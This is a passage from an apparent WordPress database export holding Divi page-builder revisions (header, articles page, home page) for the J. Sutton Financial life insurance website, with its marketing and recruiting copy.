button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 20:41:41','2023-04-08 20:41:41','',528,'http://cmdev-site1.com/?p=840',0,'revision','',0),(892,1,'2023-04-08 21:58:40','2023-04-08 21:58:40','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"J. Sutton Financial Articles\" color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_color=\"#003372\" custom_margin=\"24px|||||\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" custom_margin=\"15px|||||\" custom_padding=\"||31px|||\" global_colors_info=\"{}\"]<p style=\"font-weight: 400;\">Our resource articles are created to empower you with knowledge about insurance-related products, protection, prevention, and much more. Our hope is to educate our readers so you can feel confident when discussing insurance options – everything you read is unbiased and not specific to J. Sutton Financial policies.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-13px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-85px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"9\" include_categories=\"all\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" read_more_font=\"|700|||on|||#003372|dotted\" read_more_text_color=\"#003372\" read_more_font_size=\"16px\" pagination_font=\"||||on|||#000000|dotted\" pagination_text_color=\"#003372\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-08 21:58:40','2023-04-08 21:58:40','',615,'http://cmdev-site1.com/?p=892',0,'revision','',0),(841,1,'2023-04-08 20:42:16','2023-04-08 20:42:16','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"J. Sutton Financial Articles\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"24px|||||\" sticky_enabled=\"0\" color=\"#003372\" header_text_color=\"#003372\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" custom_margin=\"15px|||||\" custom_padding=\"||31px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p style=\"font-weight: 400;\">Our resource articles are created to empower you with knowledge about insurance-related products, protection, prevention, and much more. Our hope is to educate our readers so you can feel confident when discussing insurance options – everything you read is unbiased and not specific to J. Sutton Financial policies.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-13px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-85px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"9\" include_categories=\"all\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" read_more_font=\"|700|||on|||#003372|dotted\" read_more_text_color=\"#003372\" read_more_font_size=\"16px\" pagination_font=\"||||on|||#000000|dotted\" pagination_text_color=\"#003372\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-08 20:42:16','2023-04-08 20:42:16','',615,'http://cmdev-site1.com/?p=841',0,'revision','',0),(842,1,'2023-04-08 20:44:42','2023-04-08 20:44:42','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-72px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','FINAL Header','','publish','closed','closed','','final-header','','','2023-04-08 20:44:42','2023-04-08 20:44:42','',0,'http://cmdev-site1.com/et_pb_layout/final-header/',0,'et_pb_layout','',0),(846,1,'2023-04-08 20:46:56','2023-04-08 20:46:56','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" theme_builder_area=\"post_content\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-72px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 20:46:56','2023-04-08 20:46:56','',138,'http://cmdev-site1.com/?p=846',0,'revision','',0),(847,1,'2023-04-08 20:47:58','2023-04-08 20:47:58','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-72px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" 